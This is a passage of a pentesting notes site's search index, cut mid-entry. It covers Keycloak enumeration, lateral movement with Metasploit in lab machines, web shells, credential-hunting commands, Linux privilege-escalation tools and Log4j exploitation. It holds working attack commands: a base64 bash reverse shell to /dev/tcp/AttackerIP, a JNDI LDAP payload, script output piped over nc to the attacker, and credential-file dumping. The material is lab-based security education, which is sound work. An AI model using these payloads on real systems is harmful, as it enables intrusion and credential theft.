                        /auth/realms/<realm_name>/\n

                        A possible dictionary: https://raw.githubusercontent.com/chrislockard/api_wordlist/master/objects.txt.
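
The same enumeration can be scripted outside Burp with ffuf (a sketch; the wordlist path is an assumption):

ffuf -w objects.txt -u http://$ip/auth/realms/FUZZ/ -mc 200\n# -mc 200: keep only responses indicating an existing realm\n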

                        Realms can be configured to allow user self-registration. This is not an issue itself and is often advertised in the login page:

                        If the application is using a custom template for the login page, hiding the registration link, we can still try to directly access the registration link, which is:

/auth/realms/<realm_name>/login-actions/registration?client_id=<client_id>&tab_id=<tab_id>

                        Of course, disabling self-registration in a production environment is recommended.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#clients-id","title":"Clients ID+","text":"

                        Clients are entities that can request Keycloak to authenticate a user. Most often, clients are applications and services that want to use Keycloak to secure themselves and provide a single sign-on solution. Clients can also be entities that just want to request identity information or an access token so that they can securely invoke other services on the network that Keycloak secures.

                        Each realm (identified below) might have a different set of client ids.

                        When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

                        /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

We can use some dictionaries here.

                        Additionally, the following default client ids should also be available upon Keycloak installation:

                        account\naccount-console\naccounts\naccounts-console\nadmin\nadmin-cli\nbroker\nbrokers\nrealm-management\nrealms-management\nsecurity-admin-console\n

No HTTP response code will distinguish a valid client_id from a wrong one. We should focus instead on whether the length of the response differs from that of the majority of responses (see the ffuf sketch below).
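
A scripted alternative with ffuf, filtering on response size as described above (a sketch; the realm name, wordlist and -fs value are assumptions to adjust per target):

ffuf -w clients.txt -u \"http://$ip/auth/realms/master/protocol/openid-connect/auth?client_id=FUZZ&response_type=code&redirect_uri=http://$ip/\" -fs 1505\n# -fs 1505: filter out the response size returned for invalid client ids\n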

                        This process should be repeated for each valid realm identified in previous steps.

                        Clients can be configured with different Access Types:

• Bearer-Only\u00a0\u2013 Used for backend servers and APIs (requests that already contain a token/secret in the request header)
• Public\u00a0\u2013 Able to initiate the login flow (auth flow to get an access token) and does not hold or send any secrets
• Confidential\u00a0\u2013 Used for backend servers and able to initiate the login flow. Can accept or send secrets.

                        Therefore, when we encounter a \u201cclient_secret\u201d parameter in the login request, we\u2019re probably looking at a client with a Confidential or Bearer-Only Access Type.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#scopes","title":"Scopes","text":"

When a client is registered, you must define protocol mappers and role scope mappings for that client. It is often useful to store a client scope, to make creating new clients easier by sharing some common settings. This is also useful for requesting some claims or roles conditionally, based on the value of the scope parameter. Keycloak provides the concept of a client scope for this.

                        When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

                        /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

                        It is possible to identify additional scopes via Burp Suite Intruder, by keeping all the other parameters with the same value:

The following additional default scopes should also be available upon Keycloak installation:

                        address  \naddresses  \nemail  \nemails  \nmicroprofile-jwt  \noffline_access  \nphone  \nopenid  \nprofile  \nrole_list  \nroles  \nrole  \nweb-origin  \nweb-origins\n

It is quite straightforward to distinguish valid scopes from non-valid scopes by looking at the content length or status code.

                        This process should be repeated for each realm identified in previous steps.

It should be noted that valid scopes can be concatenated within the URL prior to login, e.g.:

                        ...&scope=openid+offline_access+roles+email+phone+profile+address+web-origins&...

This will \u2018force\u2019 Keycloak to grant any available/additional scope for that realm \u2013 depending also on the user\u2019s role configuration.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#grants","title":"Grants","text":"

                        OAuth 2 provides several \u2018grant types\u2019 for different use cases. The grant types defined are:

                        • Authorization Code for apps running on a web server, browser-based and mobile apps
                        • Password for logging in with a username and password (only for first-party apps)
                        • Client credentials for application access without a user present
                        • Implicit was previously recommended for clients without a secret, but has been superseded by using the Authorization Code grant with PKCE

                        A good resource to understand use cases of grants is available from\u00a0Aaron Parecki.\u00a0

Grants cannot be enumerated and are as follows:

authorization_code, password, client_credentials, refresh_token, implicit, urn:ietf:params:oauth:grant-type:device_code, urn:openid:params:grant-type:ciba

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider","title":"Identity Provider","text":"

                        Keycloak can be configured to delegate authentication to one or more Identity Providers (IDPs). Social login via Facebook or Google+ is an example of an identity provider federation. You can also hook Keycloak to delegate authentication to any other OpenID Connect or SAML 2.0 IDP.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider-enumeration","title":"Identity Provider Enumeration","text":"

                        There are a number of external identity providers that can be configured within Keycloak. The URL to use within Intruder is:

/auth/realms/<realm_name>/broker/<idp_name>/endpoint

The full list of default IDP names is as follows:

gitlab, github, facebook, google, linkedin, instagram, microsoft, bitbucket, twitter, openshift-v4, openshift-v3, paypal, stackoverflow, saml, oidc, keycloak-oidc

                        Once again, the status codes might differ, but the length will disclose which IDP is enabled. It should be noted that, by default, the login page will disclose which IDPs are enabled:

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#roles","title":"Roles","text":"

                        Roles identify a type or category of user. Admin, user, manager, and employee are all typical roles that may exist in an organization. Applications often assign access and permissions to specific roles rather than individual users as dealing with users can be too fine-grained and hard to manage.

                        Roles cannot be easily enumerated from an unauthenticated perspective. They are usually visible within the JWT token of the user upon successful login:

For example, the \u2018account\u2019 client_id has, by default, 2 roles.

                        Realm Default Roles:

default-roles-<realm_name>, offline_access, uma_authorization

                        Client ID Default Roles:

manage-account, manage-account-links, delete-account, manage-content, view-applications, view-consent, view-profile, read-token, create-client, impersonation, manage-authorization, manage-clients, manage-events

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#user-email-enumeration-auth","title":"User Email Enumeration (auth)","text":"

                        It is possible to enumerate valid email addresses from an authenticated perspective via Keycloak\u2019s account page (if enabled for the logged-in user), available at:

/auth/realms/<realm_name>/account/#/personal-info

                        When changing the email address to an already existing value, the system will return 409 Conflict. If the email is not in use, the system will return \u2018204 \u2013 No Content\u2019. Please note that, if Email Verification is enabled, this will send out a confirmation email to all email addresses we\u2019re going to test.

                        This process can be easily automated via Intruder and no CSRF token is needed to perform this action:

If the template of the account console was changed to not show the personal information page, you might want to try firing up the request directly (placeholder values in angle brackets):

POST /auth/realms/<realm_name>/account/ HTTP/1.1\nHost: <host>\nContent-Type: application/json\nAuthorization: Bearer <access_token>\nOrigin: <origin>\nContent-Length: 635\nConnection: close\nCookie: <cookies>\n\n{ \"id\": \"\", \"username\": \"myuser\", \"firstName\": \"my\", \"lastName\": \"user\", \"email\": \"\", \"emailVerified\": false, \"userProfileMetadata\": { \"attributes\": [ { \"name\": \"username\", \"displayName\": \"${username}\", \"required\": true, \"readOnly\": true, \"validators\": {} }, { \"name\": \"email\", \"displayName\": \"${email}\", \"required\": true, \"readOnly\": false, \"validators\": { \"email\": { \"ignore.empty.value\": true } } }, { \"name\": \"firstName\", \"displayName\": \"${firstName}\", \"required\": true, \"readOnly\": false, \"validators\": {} }, { \"name\": \"lastName\", \"displayName\": \"${lastName}\", \"required\": true, \"readOnly\": false, \"validators\": {} } ] }, \"attributes\": { \"locale\": [ \"en\" ] } }\n

The valid email addresses identified in this process can be used to perform brute force (explained in the exploitation part of Pentesting Keycloak Part Two). For this reason, access to the Keycloak account page should be disabled.

                        ","tags":["wordpress","keycloak"]},{"location":"kiterunner/","title":"Kiterunner","text":"

Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute-force tools like Gobuster/Dirbuster discover URL paths, they typically rely on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

1. First, download the dictionaries from the project. In my case I downloaded them to /usr/share/wordlists/kiterunner/:

• https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
• https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
• https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
• https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

2. Run a quick scan of your target\u2019s URL or IP address like this:

                        kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

Note, though, that we conducted this scan without any authorization headers, which the target API likely requires.

                        To use a dictionary (and not a kite file):

                        kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

                        If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

                        One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

                        kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                        Running this will replay the request and provide you with the HTTP response.

                        To run Kiterunner providing an authorization token (for example, an \"x-access-token\" header), take the full token and add it to your Kiterunner scan with the -H option:

                        kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
                        "},{"location":"knockpy/","title":"knockpy - A subdomain scanner","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#installation","title":"Installation","text":"

                        Repository: https://github.com/guelfoweb/knock

                        git clone https://github.com/guelfoweb/knock.git\ncd knock\npip3 install -r requirements.txt\n\n# Optional: Make an alias for knockpy\nsudo chmod +x knockpy.py \nsudo ln -s /home/kali/tools/knock/knockpy.py /usr/bin/knockpy\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#usage","title":"Usage","text":"
                        # From the tools/knock folder\npython3 knockpy.py <DOMAIN>\n\n# If you have made an alias, just run:\nknockpy <domain>\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"lateral-movements/","title":"Lateral movements","text":"","tags":["pentesting"]},{"location":"lateral-movements/#using-metasploit","title":"using metasploit","text":"
                        1. Get our ip
                        ip a\u00a0\n# 192.64.166.2\n
                        2. Get the machine's IP
                        ping demo.ine.local\n# 192.64.166.3\n
                        3. Enumerate services on the target machine
                        nmap -sV -sS -O 192.64.166.3\n# open ports: 80 and 3306.\n
                        4. Go further on port 80
                        nmap -sC -sV 192.64.166.3 -p 80\n# In the scan you will see: V-CMS-Powered by V-CMS and PHPSESSID: httponly flag not set\n
                        5. Launch metasploit and search for v-cms
                        service postgresql start\nmsfconsole -q\n
                        search v-cms\n
                        6. Use the exploit exploit/linux/http/vcms_upload, configure it, and run it
                        use exploit/linux/http/vcms_upload\nshow options\n
                        set RHOST 192.64.166.3\nset TARGETURI /\nset LHOST 192.64.166.2\nset payload php/meterpreter/reverse_tcp\nrun\n
                        7. You will get a limited meterpreter. Drop into a shell and print the flag
                        meterpreter> shell\n> cat /root/flag.txt\n# 4f96a3e848d233d5af337c440e50fe3d\n
                        8. Map other possible interfaces on the machine. Since ifconfig does not work, spawn a proper shell and try again
                        ifconfig\u00a0\n# does not work\n
                        ipconfig\n# does not work\n
                        which python\n# it\u2019s located under /bin, so we can use python to spawn the shell\n
                        python -c 'import pty; pty.spawn(\"/bin/bash\")'\n
                        $root@machine> ifconfig\n# it tells us about another interface: 192.182.147.2\n
                        ","tags":["pentesting"]},{"location":"lateral-movements/#route","title":"route","text":"
                        1. Add a route between interface 192.64.166.3 (which is session 1 of meterpreter) and the discovered network, 192.182.147.0/24, with the autoroute utility:
                        $root@machine> exit\n
                        meterpreter> run autoroute -s 192.182.147.0 -n 255.255.255.0\n# You can also add a route outside of meterpreter. In that case you need to specify the meterpreter session: route add 192.182.147.0 255.255.255.0 1\n
                        2. Background the meterpreter session and check whether the route was added successfully to metasploit's routing table.
                        meterpreter> background\nmsf> route print\n
                        3. Run the auxiliary TCP port-scanning module to discover any available hosts (from IP .3 to .10), and check whether any of ports 80, 8080, 445, 21, and 22 are open on those hosts.
                        msf> use auxiliary/scanner/portscan/tcp\n\nmsf auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22\n\nmsf auxiliary/scanner/portscan/tcp > set RHOSTS 192.182.147.3-10\n\nmsf auxiliary/scanner/portscan/tcp > exploit\n# Gives us ports 21 and 22 open at 192.182.147.3\n
                        ","tags":["pentesting"]},{"location":"lateral-movements/#portfwd","title":"portfwd","text":"
                        1. In order to reach the discovered target, we need to forward a port of the remote machine to a local port. We want to target port 21 of that machine, so we will forward remote port 21 to local port 1234. This is done with the portfwd utility from meterpreter:
                        msf\u00a0 auxiliary/scanner/portscan/tcp > sessions -i 1\n\nmeterpreter> portfwd\n# Tell you  there is none configured\n\nmeterpreter> portfwd add -l 1234 -p 21 -r 192.182.147.3\n# -l: local port \n# -p 21 The port we are targeting in our attack \n# -r the remote host\n\nmeterpreter> portfwd list\n# It tells the active Port Forwards. Now, scan the local port using Nmap\n
                        2. Run nmap on the forwarded local port to identify the service name
                        meterpreter> background\n\nmsf> nmap -sS -sV -p 1234 localhost\n# It tells you the ftp version: vsftpd 2.0.8 or later\n
                        3. Search for a vsftpd exploit module and exploit the target host using the vsftpd backdoor exploit module.
                        msf > search vsftpd\nmsf> use exploit/unix/ftp/vsftpd_234_backdoor\nmsf exploit/unix/ftp/vsftpd_234_backdoor> set RHOSTS 192.182.147.3\nmsf exploit/unix/ftp/vsftpd_234_backdoor> exploit\n\n# Sometimes the exploit fails the first time. If that happens, run it again.\n\n$> id\n# You are root.\n
                        4. Print the flag
                        $> cat /root/flag.txt\n# 58c7c29a8ab5e7c4c06256b954947f9a\n
                        ","tags":["pentesting"]},{"location":"laudanum/","title":"Laudanum: Injectable Web Exploit Code","text":"

                        Laudanum is a repository of ready-made files that can be used to inject into a victim and receive back access via a reverse shell, run commands on the victim host right from the browser, and more. The repo includes injectable files for many different web application languages, including ASP, ASPX, JSP, PHP, and more.

                        ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#installation","title":"Installation","text":"

                        Pre-built in Kali.

                        Download from github repo: https://github.com/jbarcia/Web-Shells/tree/master/laudanum.

                        ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#basic-usage","title":"Basic usage","text":"

                        The Laudanum files can be found in the /usr/share/webshells/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must first edit the file to insert your attacking host's IP address.

                        locate laudanum\n
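
                        A minimal sketch of preparing a shell (the ASP shell is used as an example; the exact variable to edit depends on the shell you pick):

                        cp /usr/share/webshells/laudanum/aspx/shell.aspx .\n# Edit shell.aspx and add your attacking host IP where the shell restricts allowed addresses, then upload it to the victim\n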
                        ","tags":["pentesting","web pentesting","web shells"]},{"location":"lazagne/","title":"Lazagne","text":"

                        The LaZagne project is an open-source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

                        ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/AlessandroZ/LaZagne.

                        Download a standalone copy from https://github.com/AlessandroZ/LaZagne/releases/.

                        ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#basic-usage","title":"Basic usage","text":"

                        Once Lazagne.exe is on the target, we can open command prompt or PowerShell, navigate to the directory the file was uploaded to, and execute the following command:

                        C:\\Users\\username\\Desktop> start lazagne.exe all\n# -vv: to study what it is doing in the background.\n
                        ","tags":["pentesting","web pentesting","passwords"]},{"location":"linenum/","title":"LinEnum - A tool to scan Linux system","text":"","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#installation","title":"Installation","text":"

                        Clone github repo: https://github.com/rebootuser/LinEnum

                        ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#basic-usage","title":"Basic usage","text":"
                        ./LinEnum.sh -s -r report -e /tmp/ -t\n# -k: Enter keyword\n# -e: Enter export location\n# -t: Include thorough (lengthy) tests\n# -s: Supply current user's password to check sudo perms (INSECURE)\n# -r: Enter report name\n
                        ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linpeas/","title":"linPEAS","text":"

                        LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/macOS hosts. The checks are explained at book.hacktricks.xyz.

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linpeas/#installation","title":"Installation","text":"

                        Github repo: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS.

                        An interesting feature is that you can execute it from memory and send the output back to the attacking host.
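
                        A minimal sketch of in-memory execution (the attacker IP, ports, and the way linpeas.sh is served are placeholders):

                        # On the attacker machine, serve linpeas.sh over HTTP and listen for the output\nsudo nc -lvnp 9002 | tee linpeas_output.txt\n\n# On the victim, fetch the script, run it in memory, and send the output back\ncurl -sL http://AttackerIP:8000/linpeas.sh | sh | nc AttackerIP 9002\n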

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/","title":"Linux Exploit Suggester","text":"

                        Linux Exploit Suggester does pretty much what its name says: it helps detect security deficiencies on a given Linux kernel / Linux-based machine.

                        ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#installation","title":"Installation","text":"

                        Download from https://github.com/The-Z-Labs/linux-exploit-suggester.

                        You can also download it directly to the victim's machine under a different name, let's say \"les.sh\":

                        wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh\n
                        ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#basic-commands","title":"Basic commands","text":"

                        Make sure it has execute permissions first, then run it:

                        chmod +x linux-exploit-suggester.sh\n./linux-exploit-suggester.sh\n

                        Also, a nice way to serve this payload is to copy the file into the /var/www/html folder of the attacker machine and then run:

                        service apache2 start\n
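
                        From the victim, the script can then be fetched over HTTP (the attacker IP is a placeholder):

                        wget http://AttackerIP/les.sh\n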
                        ","tags":["pentesting","privilege escalation"]},{"location":"linux-privilege-checker/","title":"Linux Privilege Checker","text":"

                        Linux privilege checker is an enumeration tool with privilege escalation checking capabilities.

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#installation","title":"Installation","text":"

                        Download from: http://www.securitysift.com/download/linuxprivchecker.py

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#basic-commands","title":"Basic commands","text":"

                        You can run it on your system by typing:

                         ./linuxprivchecker.py \n

                        or

                        python linuxprivchecker.py\n

                        Also, a nice way to serve this payload is to copy this Python file into /var/www/html and then run:

                        service apache2 start\n
                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux/","title":"Linux","text":"","tags":["linux"]},{"location":"linux/#find-sensitive-files","title":"Find sensitive files","text":"","tags":["linux"]},{"location":"linux/#configuration-files","title":"Configuration files","text":"
                        # Return files with extension .conf, .config and .cnf, which in linux are configuration files.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n\n# Search for three words (user, password, pass) in each file with the file extension .cnf.\nfor i in $(find / -name *.cnf 2>/dev/null | grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null | grep -v \"\\#\";done\n
                        ","tags":["linux"]},{"location":"linux/#databases","title":"Databases","text":"
                        # Search for databases\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n
                        ","tags":["linux"]},{"location":"linux/#scripts","title":"Scripts","text":"
                        for l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\";done\n
                        ","tags":["linux"]},{"location":"linux/#files-including-the-txt-file-extension-and-files-that-have-no-file-extension-at-all","title":"Files including the .txt file extension and files that have no file extension at all","text":"

                        Admins may rename configuration files, but you can still try to find them:

                        find /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n
                        ","tags":["linux"]},{"location":"linux/#cronjobs","title":"cronjobs","text":"

                        These are divided into the system-wide area (/etc/crontab) and user-dependent executions. Some applications and scripts require credentials to run and are therefore incorrectly entered in the cronjobs. Furthermore, there are the areas that are divided into different time ranges (/etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, /etc/cron.weekly). The scripts and files used by cron can also be found in /etc/cron.d/ for Debian-based distributions.
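
                        A quick way to inspect these locations (a minimal sketch):

                        ls -la /etc/cron* /etc/crontab /var/spool/cron 2>/dev/null\ncat /etc/crontab\n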

                        ","tags":["linux"]},{"location":"linux/#ssh-keys","title":"SSH Keys","text":"
                        grep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null | grep \":1\"\n\ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null | grep \":1\"\n
                        ","tags":["linux"]},{"location":"linux/#bash-history","title":"Bash History","text":"
                        tail -n5 /home/*/.bash*\n
                        ","tags":["linux"]},{"location":"linux/#logs","title":"Logs","text":"Log File Description /var/log/messages Generic system activity logs. /var/log/syslog Generic system activity logs. /var/log/auth.log (Debian) All authentication related logs. /var/log/secure (RedHat/CentOS) All authentication related logs. /var/log/boot.log Booting information. /var/log/dmesg Hardware and drivers related information and logs. /var/log/kern.log Kernel related warnings, errors and logs. /var/log/faillog Failed login attempts. /var/log/cron Information related to cron jobs. /var/log/mail.log All mail server related logs. /var/log/httpd All Apache related logs. /var/log/mysqld.log All MySQL server related logs.
                         for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null); if [[ $GREP ]];then echo -e \"\\n#### Log file: \" $i; grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null;fi;done\n
                        ","tags":["linux"]},{"location":"linux/#credentials-storage","title":"Credentials storage","text":"","tags":["linux"]},{"location":"linux/#shadow-file","title":"Shadow file","text":"

                        The /etc/shadow file has a unique format in which the entries are entered and saved when new users are created.

                        htb-student:    $y$j9T$3QSBB6CbHEu...SNIP...f8Ms:   18955:  0:  99999:  7:  :   :   :\n<username>:     <encrypted password>:   <day of last change>:   <min age>:  <max age>:  <warning period>:   <inactivity period>:    <expiration date>:  <reserved field>\n

                        The encryption of the password in this file is formatted as follows:

                        $<id>$<salt>$<hashed>
                        $y$j9T$3QSBB6CbHEu...SNIP...f8Ms

                        The type (id) is the cryptographic hash method used to encrypt the password. Many different cryptographic hash methods were used in the past and are still used by some systems today.

                        | ID | Cryptographic Hash Algorithm |
                        | --- | --- |
                        | $1$ | MD5 |
                        | $2a$ | Blowfish |
                        | $5$ | SHA-256 |
                        | $6$ | SHA-512 |
                        | $sha1$ | SHA1crypt |
                        | $y$ | Yescrypt |
                        | $gy$ | Gost-yescrypt |
                        | $7$ | Scrypt |

                        The /etc/shadow file can only be read by the user root.

                        ","tags":["linux"]},{"location":"linux/#passwd-file","title":"Passwd file","text":"

                        The /etc/passwd file stores one line per user, with the following format:

                        htb-student:    x:  1000:   1000:   ,,,:    /home/htb-student:  /bin/bash\n<username>:     <password>:     <uid>:  <gid>:  <comment>:  <home directory>:   <cmd executed after logging in>\n

                        The x in the password field indicates that the encrypted password is in the /etc/shadow file.

                        ","tags":["linux"]},{"location":"linux/#opasswd","title":"Opasswd","text":"

                        The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

                        # Reading /etc/security/opasswd\nsudo cat /etc/security/opasswd\n\n# cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1\n

                        Looking at the contents of this file, we can see that it contains several entries for the user cry0l1t3, separated by a comma (,). Another critical point is the hashing type that has been used: the MD5 ($1$) algorithm is much easier to crack than SHA-512. This is especially important for identifying old passwords, and maybe even their pattern, because passwords are often reused across several services or applications; knowing the pattern increases the probability of guessing the correct password many times over.

                        ","tags":["linux"]},{"location":"linux/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

                        Useful tools for this: mimipenguin and LaZagne.

                        Firefox stored credentials:

                        ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

                        The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.
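
                        A minimal usage sketch (the profile path is a placeholder):

                        python3 firefox_decrypt.py ~/.mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/\n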

                        ","tags":["linux"]},{"location":"log4j/","title":"Log4j","text":"

                        This Log4j vulnerability can be exploited by injecting a malicious JNDI lookup string into data that gets logged, leading to remote code execution. Log4j is a popular logging library for Java created in 2001. The logging library's main purpose is to provide developers with a way to change the format and verbosity of logging through configuration files rather than code.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#what-it-does","title":"What it does","text":"

                        With a logging library, instead of using print statements, the developer uses a wrapper around the logging class or object. So instead of print(line), the code would look like this:

                        logging.INFO(\"Application Started\")\nlogging.WARN(\"File Uploaded\")\nlogging.DEBUG(\"SQL Query Ran\")\n

                        Then the application has a configuration file which says what log levels (INFO, WARN, DEBUG, etc.) to display. This way when there is a problem with the application, the developer can enable DEBUG mode and instantly get the messages they need to identify the issue.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#reconnaissance-proof-of-concept","title":"Reconnaissance - Proof of Concept","text":"

                        The main way people have been testing if an application is vulnerable is by combining this vulnerability with JNDI.

                        Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.

                        In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

                        LDAP is the acronym for Lightweight Directory Access Protocol, an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over the Internet or a network. The default port that LDAP runs on is 389.

                        Proof of concepts to see if it is vulnerable:

                        1. Grab the request with the injectable parameter.

                        2. In the injectable parameter, inject something like this:

                        \"${jndi:ldap://AtackerIP/whatever}\"\n

                        With tcpdump, check if the request with the payload produces some traffic to your attacker machine:

                        sudo tcpdump -i tun0 port 389\n# -i: Select interface\n# port: indicate the port where traffic is going to be captured. \n

                        The tcpdump output shows a connection being received on our machine. This proves that the application is indeed vulnerable since it is trying to connect back to us on the LDAP port 389.

                        ","tags":["web pentesting","java","serialization vulnerability"]},{"location":"log4j/#exploitation","title":"Exploitation","text":"
                        # Install Open-JDK and Maven as requirements\nsudo apt install openjdk-11-jre maven\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's built, create a reverse shell in base64 with the attacker machine IP and listening port\necho 'bash -c bash -i >&/dev/tcp/AttackerIP/AttackerPort 0>&1' | base64\n# This will return something similar to this: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of the rogue-jndi folder and run:\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, paste your own reverse shell in base64\n# --hostname: victim IP\n\n# Now, open a terminal and launch netcat on the listening port you defined in your payload.\n

                        With Burpsuite, get a request for login:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

                        This request is from the HackTheBox machine Unified. As we can read from the Unifi version exploit, the injectable parameter is \"remember\". So we insert our payload there and send the request with Repeater:

